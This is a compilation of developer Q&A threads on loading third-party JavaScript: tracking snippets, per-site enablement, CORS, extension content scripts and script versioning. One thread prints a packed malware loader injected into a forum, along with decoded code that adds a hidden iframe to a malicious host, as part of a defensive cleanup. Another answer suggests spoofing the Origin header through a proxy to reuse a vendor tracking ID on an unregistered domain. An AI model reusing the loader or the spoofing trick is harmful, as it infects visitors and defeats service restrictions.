I am new here and I have a JavaScript tracking code:
var _trackingCode = '5sulid5e';
(function() {
var wa = document.createElement('script');
wa.type = 'text/javascript';
wa.async = true;
wa.src = '//cdn.8digits.com/automation.js';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wa, s);
})();
I want to customize that to work on another website.
It works on vestel.com.tr but it doesn't work on mavi.com.
How can I customize that script for mavi.com?
Thanks for your help.
Perhaps you can hack this by writing a proxy, as some vendors may bind tracking IDs to a specific domain.
Forward the AJAX from the vendor's JS code to your proxy server. In your proxy server, modify the Origin request header to the registered one, i.e. vestel.com.tr. For this you will need to modify the JS code provided by the vendor, located at cdn.8digits.com/automation.js, and then in the script tag of your website provide the script source as your hacked JS, NOT the actual one.
PS: you can't modify the Origin header in the browser's AJAX itself due to security restrictions by browsers.
If I have JS script on several different websites, is it possible to enable or disable script execution for specific sites? If this isn't possible, other suggestions for implementation are welcome.
Here's the application:
I have a script tag with my JS source link that site owners can put on their website to enable interaction with my service. However, I would like to be able to enable/disable the service for specific sites so as not to deploy it until they are ready.
Note: The script tag also includes site verification information, so it gets put on their site before they are ready to deploy. This saves the step of putting in a site verification tag and then going back and putting in the script.
You would want them to put your .ashx handler on your website, then make that return the JavaScript.
Follow the tutorial for ASHX pages if you are unsure how: http://www.brainbell.com/tutorials/ASP/Generic_Handlers_(ASHX_Files).html
In the ProcessRequest() function:
Check to see if they have it enabled. You can use the query string (https://msdn.microsoft.com/en-us/library/system.web.httprequest.querystring(v=vs.110).aspx) to see which website it is. In the code below there is ?yourwebsitedomain=customersdomain, so you would query for "yourwebsitedomain" and you would get "customersdomain".
If they do, then get the bytes of your file using Encoding.UTF8.GetBytes(File.ReadAllText(filename))
and write the results to the output:
context.Response.OutputStream.Write(FileBytes, 0, FileBytes.Length);
context.Response.OutputStream.Flush();
Your customer's website:
<script>
(function() {
var c = document.createElement('script');
c.type = 'text/javascript'; c.async = true;
c.src = "http://yourdomain/yourhandler.ashx?yourwebsitedomain=customersdomain";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(c,s);
})();
</script>
Hope this helps.
I'm using a tracking site to get some statistics. They say I should use the code:
var trackingstring = new String("<script src=\"http://trackingsite.com/track?C=12345&source=js\" type=\"text/javascript\"></script>");
document.write(trackingstring);
However, I want to trigger a particular site statistic on a jQuery event rather than on page load, so I can't use document.write.
I believe there's actually no script to run at the URL, so I tried:
var thetrackingURL = "http://trackingsite.com/track?C=12345&source=js";
$.get(thetrackingURL);
However that gives me the error:
XMLHttpRequest cannot load http://trackingsite.com/track?C=12345&source=js. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://example.com' is therefore not allowed access.
How can I trigger that URL to be loaded by a jQuery event?
Try
var script = document.createElement("script");
script.src = "http://trackingsite.com/track?C=12345&source=js";
document.body.appendChild(script);
or, utilizing jQuery:
$.ajaxSetup({context:document.body});
$.getScript("http://trackingsite.com/track?C=12345&source=js");
Please read: https://security.stackexchange.com/questions/43639/why-is-the-access-control-allow-origin-header-necessary
Host your page on some local web server using NGINX or anything else suitable.
I'm sure if you search even Stack Overflow, you will find lots of information regarding this topic.
I am making a chrome extension and I would like to make use of a third party API but I am running into some issues and I've been stuck on this problem for a while...
Problem:
I cannot make use of the functions in the API even though the Chrome dev tools say that the API was loaded successfully.
I've tried to load the API at different times to see if that would make a difference but it doesn't seem to.
I've used the API successfully in a basic web page. But I cannot seem to get it working in the content script of the extension.
Here's the code to load the API:
(function() {
var scr = document.createElement('script');
scr.type = 'text/javascript';
scr.src = 'someurl';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(scr, s);
})();
Manifest:
"content_security_policy": "script-src 'self' someurl; object-src 'self'"
I've also done the tutorial that Google offers on how to use Google Analytics within an extension because I thought it would be relevant. But no luck. Any guidance would be appreciated.
You are injecting the API into the context of the webpage when you append a script tag; your content script remains isolated from it.
To circumvent that, one possible solution is to also append some of your code that would then talk to your extension, either through the DOM or through external messages.
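One way to build the bridge this answer describes, as an added example rather than the answerer's code: a small shim appended into the page context forwards calls to the API and posts results back, and the content script validates every message before trusting it. The `thirdPartyApi` global, the `BRIDGE_NS` tag and the message shapes are assumptions; `win` is passed in so the checks can be exercised outside a browser.

```javascript
// Added example, not the answerer's code. `thirdPartyApi`, BRIDGE_NS and the
// {ns, dir, id, ...} message shape are assumptions for illustration.
const BRIDGE_NS = 'my-ext-bridge';   // tag so unrelated postMessage traffic is ignored

// Runs in the page context (the same world as the appended API script). Kept as
// source text because the content script has to inject it as a <script>.
const PAGE_SHIM = `
  window.addEventListener('message', function (ev) {
    var d = ev.data;
    if (ev.source !== window || !d || d.ns !== '${BRIDGE_NS}' || d.dir !== 'call') return;
    var reply = { ns: '${BRIDGE_NS}', dir: 'reply', id: d.id };
    try { reply.result = window.thirdPartyApi[d.method].apply(null, d.args || []); }
    catch (e) { reply.error = String(e); }
    window.postMessage(reply, window.location.origin);   // never '*': stay on this origin
  });`;

// Content-script side: inject the shim next to the API script.
function injectShim(doc) {
  const el = doc.createElement('script');
  el.textContent = PAGE_SHIM;
  (doc.head || doc.documentElement).appendChild(el);
  el.remove();   // the listener stays registered; the element is no longer needed
}

// Content-script side: accept a reply only from this window, this origin and
// with our tag, so a frame or another script on the page cannot spoof results.
function makeReplyHandler(win, onReply) {
  return function (ev) {
    if (ev.source !== win) return 'rejected:source';
    if (ev.origin !== win.location.origin) return 'rejected:origin';
    const d = ev.data;
    if (!d || d.ns !== BRIDGE_NS || d.dir !== 'reply' || typeof d.id !== 'number') return 'rejected:shape';
    onReply(d.id, d.error ? { error: d.error } : d.result);
    return 'accepted';
  };
}

// Content-script side: ask the page world to call a method on the API.
function callPageApi(win, id, method, args) {
  win.postMessage({ ns: BRIDGE_NS, dir: 'call', id, method, args }, win.location.origin);
}
```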
My website, 3dsforums.com, has been marked as an attack site for containing malware. According to Google Webmaster Tools, this is the suspected code that has been injected onto every page:
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>
As such, I have two questions:
Is this actually the offending code?
And how do I remove it?
I can't seem to find it via the templates in vBulletin, or through phpMyAdmin, so I'm lost as to what I should do.
Thanks for any help.
JS Beautifier decompresses that as this:
var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);
It looks suspicious (who would obfuscate that?), so I would assume that yes, it's the problem, and you should remove it.
Edit: Now that the malicious site is back up, I can analyze the rest: it appears to add an iframe:
var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);
Kind of strange to be appending it to the head.
The in.cgi script appears to redirect to Google if the User-Agent is not very exploitable. Otherwise, it redirects to another malicious website.
It continues branching off with many iframes. Many of them do nothing (although at that point, I was only trying the User-Agent for MSIE 6 on WinXP), but I eventually wound up with two Java applets. When I decompiled them, all the names were mangled and I didn't bother to try to figure out what it's doing.
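The decoding this answer did with JS Beautifier can also be done by hand, without ever running the payload, by replaying the packer's own dictionary substitution. This is an added example, not the answerer's tooling; `PACKED` is the blob from the question, and the helper names are my own.

```javascript
// Added example, not the answerer's tooling: decode the eval(function(p,a,c,k,e,r){...})
// packer from the question by replaying its dictionary substitution, so the
// injected code can be read without executing it. PACKED is the blob from the question.
const PACKED =
  String.raw`<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};` +
  String.raw`if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];` +
  String.raw`e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}` +
  String.raw`('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,` +
  String.raw`'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>`;

// Pull the four arguments (p, a, c, k) out of the trailing call "...return p}(p,a,c,'k'.split('|'),...)".
function extractPackerArgs(blob) {
  const m = /return p\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'([^']*)'\.split\('\|'\)/.exec(blob);
  if (!m) return null;
  const p = m[1].replace(/\\(['"\\])/g, '$1');   // undo the \' and \\ escapes of the string literal
  return { p, a: parseInt(m[2], 10), c: parseInt(m[3], 10), k: m[4].split('|') };
}

// Same mapping the packer builds at runtime: token i (written in base `a`) -> k[i],
// or the token itself when k[i] is empty.
function unpack({ p, a, c, k }) {
  const dict = {};
  for (let i = 0; i < c; i++) dict[i.toString(a)] = k[i] || i.toString(a);
  return p.replace(/\b\w+\b/g, (tok) => (tok in dict ? dict[tok] : tok));
}

function decodePacked(blob) {
  const args = extractPackerArgs(blob);
  return args ? unpack(args) : null;
}

// Hosts referenced by the decoded code, for blocklists and log searches.
function referencedHosts(code) {
  const hosts = new Set();
  for (const m of code.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}
```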
The first thing you should do is change your FTP or SSH login and password.
The above looks like an FTP exploit. It looks like either you are out of date with your OS updates or you are letting the whole world write to your files.
Even though you overwrite your files, the problem may come back. So I strongly suggest you check:
Note the last modified date of the files in question.
Check your FTP, SSH and access logs to see if you can find something fishy.
1a. Immediately remove write access to all the site's files. Do this as a precaution, just to be safe from a similar attack.
1b. Overwrite your files from backup.
Check if Apache, or whatever web server you are using, has a pending update.
Check the file permissions for your website.
Change your FTP password immediately.
Advice: change your passwords to something strong, e.g. KLioof*(&^paswl
It was actually hiding in includes/functions.php on lines 6844 and 6845; the two lines were replacing </head> with their script + </head>.
A tough one to find, and smart too.
I resolved this problem. You must find and delete the Base64 function with the shady string in the site files. It decodes this script from the string.
I'm working on a plugin that will be added to external sites, something like the Meebo/Wibiya bar. I'm looking into how to version my files.
What I want to achieve:
The website only has to add a few lines of <script> to their site.
I'll be able to silently upgrade the js file they're using, if I choose to, without them modifying their code.
I'll be able to serve different js files for different websites.
JS files will be cached unless they change.
I'll be able to perform A/B tests (i.e., have 2 different JS files loaded for a single website, randomly chosen for each visitor).
How can I go about achieving all these goals? Or at least as many of them as possible?
Off the top of my head, I think something like the following should get things moving.
You could use some sort of API key to identify the remote sites,
you could also use the HTTP referer but that's not completely
reliable. Then, copy what Google Analytics does and get the clients
to embed a little bit of JavaScript like this:
var _edan_cfg = _edan_cfg || { };
_edan_cfg.apiKey = 'The-API-key-goes-here'; // Just in case you want it later.
(function() {
var e = document.createElement('script');
e.type = 'text/javascript';
e.async = true;
e.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www')
+ '.your-domain-name.com/some_sensible_path/'
+ encodeURIComponent(_edan_cfg.apiKey);
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(e, s);
})();
That should satisfy your first two points.
On the server side you extract the API key from the incoming path,
that key tells you what site you're talking to so you can send back
whatever JavaScript is appropriate. You can use the HTTP caching
headers to attempt to control caching. That should take care of
points two and three.
The last requirement is a bit more interesting but nothing impossible.
The script you send back can always support multiple renderings or
behaviors, the script can also choose which behavior based on
whatever conditions you can think of. The script can also load more
scripts from your server by creating more <script> tags as above.
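The server-side decision behind this loader, and the enable/disable check the earlier .ashx answer describes, as an added example written as a pure function (not the answerer's code): validate the key, refuse disabled or unknown sites with an empty script, treat the Referer as a soft check, bucket visitors deterministically for A/B, and set caching headers from a content ETag. The key format, registry contents, host check and bucket split are assumptions; `visitorId` is assumed to come from a cookie.

```javascript
// Added example, not the answerer's code. REGISTRY, the key format and the
// bucketing rule are constructed for illustration.
const REGISTRY = {   // constructed sample: apiKey -> site config
  k_a1b2c3: { host: 'customer-one.example', enabled: true,
              variants: { A: 'console.log("widget A");', B: 'console.log("widget B");' } },
  k_d4e5f6: { host: 'customer-two.example', enabled: false,
              variants: { A: 'console.log("widget");' } },
};

function fnv1a(str) {   // small stable hash, used for ETags and A/B bucketing
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) h = Math.imul(h ^ str.charCodeAt(i), 0x01000193) >>> 0;
  return h.toString(16).padStart(8, '0');
}

function hostOf(url) { try { return new URL(url).hostname; } catch (e) { return null; } }

function buildScriptResponse(registry, apiKey, referer, visitorId, ifNoneMatch) {
  const js = { 'Content-Type': 'application/javascript' };
  // 1. Validate the key before it touches the registry or any file path.
  if (!/^k_[a-z0-9]{6,32}$/.test(apiKey || '')) return { status: 400, headers: {}, body: '' };
  const site = registry[apiKey];
  // 2. Unknown or not yet enabled: return an empty script (the customer's page keeps
  //    working) and tell caches not to keep it, so enabling later takes effect at once.
  if (!site || !site.enabled) return { status: 200, headers: { ...js, 'Cache-Control': 'no-store' }, body: '/* disabled */' };
  // 3. Referer is only a soft check: it may be absent or spoofed, but a mismatch
  //    is still worth refusing and logging.
  const refHost = hostOf(referer || '');
  if (refHost && refHost !== site.host) return { status: 403, headers: {}, body: '' };
  // 4. Deterministic A/B bucket: one visitor always sees the same variant.
  const names = Object.keys(site.variants).sort();
  const variant = names[parseInt(fnv1a(apiKey + ':' + visitorId), 16) % names.length];
  const body = site.variants[variant];
  // 5. Content-based ETag: a silent upgrade changes the body, so the tag changes too.
  //    'private' because the body depends on the visitor, not just the URL.
  const etag = '"' + fnv1a(body) + '"';
  if (ifNoneMatch === etag) return { status: 304, headers: { ETag: etag }, body: '' };
  return { status: 200, body,
           headers: { ...js, 'Cache-Control': 'private, max-age=3600', ETag: etag, 'X-Variant': variant } };
}
```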